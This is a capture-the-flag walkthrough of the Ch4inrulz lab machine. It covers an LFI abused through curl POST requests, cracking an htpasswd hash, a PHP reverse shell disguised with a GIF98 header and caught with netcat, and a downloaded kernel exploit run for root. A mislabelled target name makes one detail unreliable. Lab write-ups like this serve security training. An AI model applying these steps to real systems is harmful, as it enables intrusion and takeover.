Ch4inrulz: 1.0.1 Walkthrough

Lab Environment

Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux

Vulnerable Machine : Solid State: 1

Let’s start hacking and breach the security of this machine

Scanning Phase : Let’s start with knowing our attacking machine’s ip
        Syntax used : ifconfig
                Results :

Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
      Syntax used : arp-scan --local
                  Victim machine :

Enumeration Phase : Now using nmap to scan the services running on ports .
    Syntax used : nmap -A -p-  -Pn
     Results : http service is active on port 80,8011 ,ftp is active on port 21
and Ssh on port 22

Now browsing IP in desired browser to see the webpage on port 80

Now , fired up dirb to enumerate directories
Syntax used : dirb

On browsing the links one by one i got something on
Note: Here is the hint of the upload functionality .

So changing the url from To
Results : I got the uploading functionality on the webpage.
On getting prompt for authentication , i just clicked on cancel .
This means I have to find credentials too .

Now , for further enumeration i shifted towards port 8011 and fired dirb to enumerate directories
Syntax used : dirb

Tried to browse the IP as http service is active on port 8011 and i got a webpage
I got one link from  dirb results :
Results : Got directions to php files

So after opening files_api.php , a message was displayed in front of me which means that LFI can  be there so tried LFI and tried to passing the ‘file’ parameter as first line says

LFI syntax :
Results : ‘WRONG INPUT !!’ Hint of using another technique

Here , using curl utility of kali linux to send request as POST request
Syntax used : curl -X POST -d “file=/etc/passwd”

No credentials  found yet and there was development server we found earlier so I again decided to run dirb and this time with different wordlist
Syntax used : dirb  /usr/share/wordlists/dirb/big,txt
Results : Found index.html.bak file link

Browsing the link i.e
Results : Downloadable file

Using cat command to view the content of the file
Syntax used : cat index.html.bak
Results : highlighted part is the passwd as written that it is the .htpasswd file

Copying the highlighted flag in text file named hash.txt and using john to crack it.
Syntax used : john hash.txt
Results: frank:frank!!!

Using the above credentials  to upload gif file into the uploader as uploader will only accept image file .

How i created payload with gif extension?
Command used : locate php-reverse
Results : I found php payload and modified it

Accessed it and copied the code in leafpad and changed the localhost to attacker’s IP and port as desired

Now added GIF98 in starting of the code so that it will act as gif and will not get detected

Now ,uploaded the payload successfully with username as frank and password as frank!!!

Now the main part is here i have to trigger that payload using POST request and have to fire up netcat
Command used : curl -X POST -d “file=/var/www/development/uploader/FRANKuploads/paras.gif”
Note: It took me long to guess the correct directory on which file is uploaded
Command used for netcat: nc -lnvp 1234(port number)

Results : got connection in netcat and spawned the shell
Command to spawn the shell: python -c ‘import pty; pty.spawn(“/bin/bash”)’

Now after getting the kernel version of victim machine
Command used : uname -a
Results : kernel 2.6.36
Found one exploit on exploit-db and downloaded that in attacker’s machine .
Transferred that exploit to victim after creating python server in attackers machine.
Command used : python -m SimpleHTTPserver 80
Transferred the exploit from attacker’s to victim machine in tmp directory of victim
Command used in victim machine to download the exploit from attacker’s machine :

Command to compile the exploit : gcc 15285.c -o 15285
Command used: chmod 777 15285
Explanation: to make file readable ,writeable and executeable .

Running exploit
Command used : ./15285
Results : root permissions

On exploring finally found the root flag

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